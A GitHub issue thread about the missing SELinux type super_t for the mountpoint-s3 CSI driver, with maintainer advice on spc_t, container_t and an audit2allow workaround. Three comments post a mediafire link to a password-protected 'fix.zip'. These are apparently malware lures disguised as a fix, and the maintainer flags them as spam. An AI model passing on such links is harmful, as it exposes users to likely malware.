### ISSUE TITLE
selinux type super_t not given on our cluster

### ISSUE THREAD

**Issue by schlichtanders** [awslabs/mountpoint-s3-csi-driver#242]
Hi there, I think this is just asking for some documentation about how mountpoint-s3 depends on selinux.
The default config sets the type to `super_t`, however on our k8s cluster there isn't such a policy setup.

Would be great to know which other type to use instead or how to define it.

EDIT: for others to find this easier. The actual error is quite confusing it looks like 
```
error during container init: write /proc/self/attr/keycreate: invalid argument: unknown"
```
And [this other issue](https://github.com/containerd/containerd/issues/5864#issuecomment-897939830) was helping me to pin down that it might have something todo with the selinux type

/triage support

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rphmauriciodev** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by schlichtanders** [comment]
Is this an attack done twice by different users/bots? Looks weird

**Comment by WaveListenToMe** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by unexge** [comment]
SELinux is not fully supported at the moment and the support is tracked with https://github.com/awslabs/mountpoint-s3-csi-driver/issues/169.

I think the type to use depends on your OS and the SELinux policies you install (it seems like [`super_t`](https://github.com/bottlerocket-os/bottlerocket/blob/develop/SECURITY_GUIDANCE.md#limit-use-of-privileged-selinux-labels) mainly targets [Bottlerocket](https://bottlerocket.dev/)). For example, if you install [container-selinux](https://github.com/containers/container-selinux), you could try using `container_t` or `spc_t`. `spc_t` is similar to `super_t` and gives more access - which might be needed until we fully support SELinux as we mount `/proc/mounts` currently.

The other comments indeed seem like spam, I removed them.

**Comment by schlichtanders** [comment]
Thank you for pointing to `spc_t`. Indeed that is available on our machines. :+1:

**Comment by schlichtanders** [comment]
I also tried using `container_t` now, it is also available. But even fails earlier within the s3 daemonset

```
failed to start systemd supervisor: Failed to connect to systemd: dial unix /run/systemd/private: connect: permission denied
```

**Comment by schlichtanders** [comment]
Apparently a similar issue is already reported at another issue https://github.com/awslabs/mountpoint-s3-csi-driver/issues/108#issuecomment-1875882741 so this really seems to be the thing :)

**Comment by unexge** [comment]
We currently [create pseudo-terminal](https://github.com/awslabs/mountpoint-s3-csi-driver/blob/d64b6bdc6938fab79aa89edb99e1b421d8047fa2/pkg/system/systemd.go#L359-L373) to [get stdout/stderr of `mount-s3`](https://github.com/awslabs/mountpoint-s3-csi-driver/blob/d64b6bdc6938fab79aa89edb99e1b421d8047fa2/pkg/system/systemd.go#L175-L177) process and most SELinux installations blocks it I think. We'll handle that as part of https://github.com/awslabs/mountpoint-s3-csi-driver/issues/169, but meanwhile, would you be able to use the workaround from the comment you shared using `audit2allow`?

**Comment by schlichtanders** [comment]
yes indeed that workaround seems to work :+1:

**Comment by unexge** [comment]
Closing this issue for now. Will be sharing updates regarding SELinux in https://github.com/awslabs/mountpoint-s3-csi-driver/issues/169.
